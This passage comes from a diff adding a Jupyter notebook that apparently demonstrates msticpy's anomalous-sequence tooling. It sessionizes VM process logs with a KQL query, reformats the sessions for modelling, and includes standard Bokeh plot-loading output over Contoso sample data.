lot\"},{\"attributes\":{\"end\":1590700256800.0,\"start\":1590589429200.0},\"id\":\"2021\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2079\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"2012\"}},\"id\":\"2017\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"1979\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2059\",\"type\":\"DaysTicker\"}],\"root_ids\":[\"2048\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.2\"}};\n",
+       "  var render_items = [{\"docid\":\"ddfc3e2e-f942-4131-9d1c-698c8d29773d\",\"root_ids\":[\"2048\"],\"roots\":{\"2048\":\"95df387b-f9cd-4993-a803-4d7bcf652936\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2048"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# let's model and visualise these sessions in one go\n",
+    "\n",
+    "anomalous.score_and_visualise_sessions(\n",
+    "    data=data,\n",
+    "    session_column='param_session',\n",
+    "    window_length=3,\n",
+    "    time_column='begin',\n",
+    "    source_columns=['UserId', 'ClientIP']\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Sessionize VM Process Logs <a id='vm_sessions'></a>\n",
+    "\n",
+    "The cell below contains a kusto query which queries the VMProcess table in Log Analytics. In this example, we wish for the sessions to be on a per UserId - Computer basis. In addition, we require that each session be no longer than 20 minutes in total, with each command no more than 2 minutes apart from each other. (These requirements can be adjusted for different data-sets/use-cases etc).\n",
+    "\n",
+    "Note that in the examples for [Office Activity](#office_sessions) and [AWS Cloud Trail](#aws_sessions) logs, it was fairly clear cut from the data what we could use as parameters for each of the events/commands. However, for the VM Process Logs, it is less clear.\n",
+    "\n",
+    "Some possible approaches:\n",
+    "\n",
+    "1. The command line entries are provided. So a possible approach could be to parse the command line logs into the commands used and their accompanying parameters.\n",
+    "2. The executable name could be used as the event/command <br>\n",
+    "    a) The services associated with the executable could be used as the parameters <br>\n",
+    "    b) Or we could use a combination of some other columns as the parameters\n",
+    "    \n",
+    "In this example, we apply approach (2b). In particular, we use \"ExecutableName\" as the event/command, and the following columns as parameters: \"DisplayName\", \"ProductName\", \"Group\", \"ProductVersion\", \"ExecutablePath\".\n",
+    "\n",
+    "<b>Important note:</b><br> \n",
+    "Some modelling assumptions are made in the anomalous_sequence subpackage of msticpy.\n",
+    "\n",
+    "In particular, when we model the third session type (command + params + values), we make the assumption that the values depend only on the parameter and not on the command.\n",
+    "\n",
+    "This means if we were to treat the parameters as a dictionary for example:\n",
+    "\n",
+    "Cmd(name=\"miiserver\", params={\"ProductVersion\": \"123542\", \"ExecutablePath\": \"a/path\"})\n",
+    "\n",
+    "Then the value \"123542\" will be conditioned only on param \"ProductVersion\" and value \"a/path\" will be conditioned only on param \"ExecutablePath\". But since ProductVersion, and ExecutablePath parameters will be present for all the events, this is not useful. We want the values to be conditioned on the executable.\n",
+    "\n",
+    "Therefore, for this approach, we will use the second session type (command + params). For example:\n",
+    "\n",
+    "Cmd(name=\"miiserver\", params={\"123542\", \"a/path\"})\n",
+    "\n",
+    "Now, the presence of \"123542\" and \"a/path\" will be modelled independently conditional on the executable \"miiserver\"\n",
+    "\n",
+    "(note, this modification is still not perfect, since \"123542\" and \"a/path\" will each be modelled as Bernoulli instead of categorical. But this approach should hopefully still be affective at downscoring the likelihood of the rarer param settings conditional on the executable.)\n",
+    "\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 45,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "query = \"\"\"\n",
+    "let time_back = 7d;\n",
+    "VMProcess\n",
+    "| where TimeGenerated >= ago(time_back)\n",
+    "//\n",
+    "// exclude some known automated users\n",
+    "| where UserDomain != 'NT AUTHORITY'\n",
+    "| extend UserId = strcat(UserName, '--', UserDomain)\n",
+    "| where UserId != \"--\"\n",
+    "//\n",
+    "// replace backwards slash with forward slash in ExecutablePath and make it lower case\n",
+    "| extend path = replace(@'\\\\\\\\', @'/',tolower(ExecutablePath))\n",
+    "//\n",
+    "// create dynamic params variable which has the ExecutableName as the key and some other columns as the values\n",
+    "| extend params = todynamic(strcat('{\"', ExecutableName, '\": [\"', DisplayName, '\", \"', ProductName, '\", \"', Group,'\", \"', ProductVersion, '\", \"', path, '\"]}'))\n",
+    "//\n",
+    "// keep only the needed columns\n",
+    "| project TimeGenerated, Computer, UserId, ExecutableName, params\n",
+    "//\n",
+    "// sort by the user related columns and the timestamp column in ascending order\n",
+    "| sort by UserId asc, Computer asc, TimeGenerated asc\n",
+    "//\n",
+    "// calculate the start time of each session into the \"begin\" variable\n",
+    "// With each session max 20 mins in length with each event at most 2 mins apart.\n",
+    "// A new session is created each time one of the user related columns change.\n",
+    "| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or Computer != prev(Computer))\n",
+    "//\n",
+    "// summarize the executables and the params by the user related variables and the \"begin\" variable\n",
+    "| summarize executables=makelist(ExecutableName), end=max(TimeGenerated), nExecutables=count(), \n",
+    "    nDistinctExecutables=dcount(ExecutableName), params=makelist(params) by UserId, Computer, begin\n",
+    "//\n",
+    "// optionally specify an order to the final columns\n",
+    "| project UserId, Computer, nExecutables, nDistinctExecutables ,begin, end, duration=end-begin, executables, params\n",
+    "//\n",
+    "//optionally filter out sessions which contain only one event\n",
+    "//| where nExecutables > 1\n",
+    "\"\"\""
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 47,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# execute the query\n",
+    "vm_df = qry_prov.exec_query(query=query)\n",
+    "# I comment out this cell and run it again once it has run to prevent the notebook from slowing down"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 48,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(3582, 9)\n"
+     ]
+    }
+   ],
+   "source": [
+    "try:\n",
+    "    print(vm_df.shape)\n",
+    "except AttributeError as e:\n",
+    "    vm_df = _kql_raw_result_.to_dataframe()\n",
+    "    print(vm_df.shape)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 49,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>nExecutables</th>\n",
+       "      <th>nDistinctExecutables</th>\n",
+       "      <th>begin</th>\n",
+       "      <th>end</th>\n",
+       "      <th>duration</th>\n",
+       "      <th>executables</th>\n",
+       "      <th>params</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>AAD_c47380e4e88e--CONTOSO</td>\n",
+       "      <td>ContosoDc.Contoso.Azure</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-21 18:32:45.557000+00:00</td>\n",
+       "      <td>2020-05-21 18:32:45.557000+00:00</td>\n",
+       "      <td>0 days</td>\n",
+       "      <td>[miiserver]</td>\n",
+       "      <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>AAD_c47380e4e88e--CONTOSO</td>\n",
+       "      <td>ContosoDc.Contoso.Azure</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-21 19:32:45.731000+00:00</td>\n",
+       "      <td>2020-05-21 19:32:45.731000+00:00</td>\n",
+       "      <td>0 days</td>\n",
+       "      <td>[miiserver]</td>\n",
+       "      <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>AAD_c47380e4e88e--CONTOSO</td>\n",
+       "      <td>ContosoDc.Contoso.Azure</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-21 20:32:45.911000+00:00</td>\n",
+       "      <td>2020-05-21 20:32:45.911000+00:00</td>\n",
+       "      <td>0 days</td>\n",
+       "      <td>[miiserver]</td>\n",
+       "      <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>AAD_c47380e4e88e--CONTOSO</td>\n",
+       "      <td>ContosoDc.Contoso.Azure</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-21 21:32:46.104000+00:00</td>\n",
+       "      <td>2020-05-21 21:32:46.104000+00:00</td>\n",
+       "      <td>0 days</td>\n",
+       "      <td>[miiserver]</td>\n",
+       "      <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>AAD_c47380e4e88e--CONTOSO</td>\n",
+       "      <td>ContosoDc.Contoso.Azure</td>\n",
+       "      <td>1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-21 22:32:46.271000+00:00</td>\n",
+       "      <td>2020-05-21 22:32:46.271000+00:00</td>\n",
+       "      <td>0 days</td>\n",
+       "      <td>[miiserver]</td>\n",
+       "      <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                      UserId                 Computer  nExecutables  \\\n",
+       "0  AAD_c47380e4e88e--CONTOSO  ContosoDc.Contoso.Azure             1   \n",
+       "1  AAD_c47380e4e88e--CONTOSO  ContosoDc.Contoso.Azure             1   \n",
+       "2  AAD_c47380e4e88e--CONTOSO  ContosoDc.Contoso.Azure             1   \n",
+       "3  AAD_c47380e4e88e--CONTOSO  ContosoDc.Contoso.Azure             1   \n",
+       "4  AAD_c47380e4e88e--CONTOSO  ContosoDc.Contoso.Azure             1   \n",
+       "\n",
+       "   nDistinctExecutables                            begin  \\\n",
+       "0                     1 2020-05-21 18:32:45.557000+00:00   \n",
+       "1                     1 2020-05-21 19:32:45.731000+00:00   \n",
+       "2                     1 2020-05-21 20:32:45.911000+00:00   \n",
+       "3                     1 2020-05-21 21:32:46.104000+00:00   \n",
+       "4                     1 2020-05-21 22:32:46.271000+00:00   \n",
+       "\n",
+       "                               end duration  executables  \\\n",
+       "0 2020-05-21 18:32:45.557000+00:00   0 days  [miiserver]   \n",
+       "1 2020-05-21 19:32:45.731000+00:00   0 days  [miiserver]   \n",
+       "2 2020-05-21 20:32:45.911000+00:00   0 days  [miiserver]   \n",
+       "3 2020-05-21 21:32:46.104000+00:00   0 days  [miiserver]   \n",
+       "4 2020-05-21 22:32:46.271000+00:00   0 days  [miiserver]   \n",
+       "\n",
+       "                                                                                                params  \n",
+       "0  [{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...  \n",
+       "1  [{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...  \n",
+       "2  [{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...  \n",
+       "3  [{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...  \n",
+       "4  [{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...  "
+      ]
+     },
+     "execution_count": 49,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "vm_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Convert VM Process sessions to the correct format for the model <a id='clean_vm'></a>\n",
+    "\n",
+    "Recall the allowed session types [here](#create_sessions)\n",
+    "\n",
+    "<b>So let's see what needs to be done to the vm_df</b>\n",
+    "\n",
+    "The \"executables\" column is already in a suitable format of type (1). This is because it is a list of strings.\n",
+    "If we wish to also include the parameters to the model, then we need to transform the \"params\" column slightly."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 50,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# define a helper function for converting the sessions with params into a suitable format\n",
+    "\n",
+    "def process_vm_session(session_with_params: List[Dict[str, Dict[str, any]]]) -> List[Cmd]:\n",
+    "    \"\"\"\n",
+    "    Converts a vm session with params to an allowed format.\n",
+    "    \n",
+    "    param session_with_params: example format:\n",
+    "         [{'Explorer': ['Explorer','Microsoft® Windows® Operating System',\n",
+    "           'Microsoft® Windows® Operating System', '10.0.14393.0', 'c:/windows/explorer.exe']}]\n",
+    "\n",
+    "    return: list of the Cmd data type which includes the parameters  \n",
+    "    \"\"\"\n",
+    "    new_ses = []\n",
+    "    for cmd in session_with_params:\n",
+    "        c = list(cmd.keys())[0]\n",
+    "        par = list(cmd.values())[0]\n",
+    "        new_pars = set(par)\n",
+    "        new_ses.append(Cmd(name=c, params=new_pars))\n",
+    "    return new_ses"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 51,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's create suitable sessions for params\n",
+    "sessions = vm_df.executables.values.tolist()\n",
+    "param_sessions = []\n",
+    "\n",
+    "for ses in vm_df.params.values.tolist():\n",
+    "    new_ses_set = process_vm_session(session_with_params=ses)\n",
+    "    param_sessions.append(new_ses_set)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 52,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['miiserver']\n",
+      "[Cmd(name='miiserver', params={'c:/program files/microsoft azure ad sync/bin/miiserver.exe', 'miiserver', 'Microsoft® Azure® AD Connect', '1.5.30.0'})]\n"
+     ]
+    }
+   ],
+   "source": [
+    "# let's see the differences between the two types of sessions\n",
+    "ind = 0\n",
+    "\n",
+    "print(sessions[ind])\n",
+    "\n",
+    "print(param_sessions[ind])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 53,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's add these reformatted sessions as columns to a dataframe\n",
+    "data = vm_df\n",
+    "data['session'] = sessions\n",
+    "data['param_session'] = param_sessions"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Now we will model and visualise these sessions in one go.\n",
+    "\n",
+    "We do this using the <b>score_and_visualise_sessions</b> function.\n",
+    "\n",
+    "As before, since we created columns for 2 of the 3 session types, the session_column argument can be set to any of the following:\n",
+    "\n",
+    "- session\n",
+    "- param_session"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 54,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2301\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"2301\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"2301\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
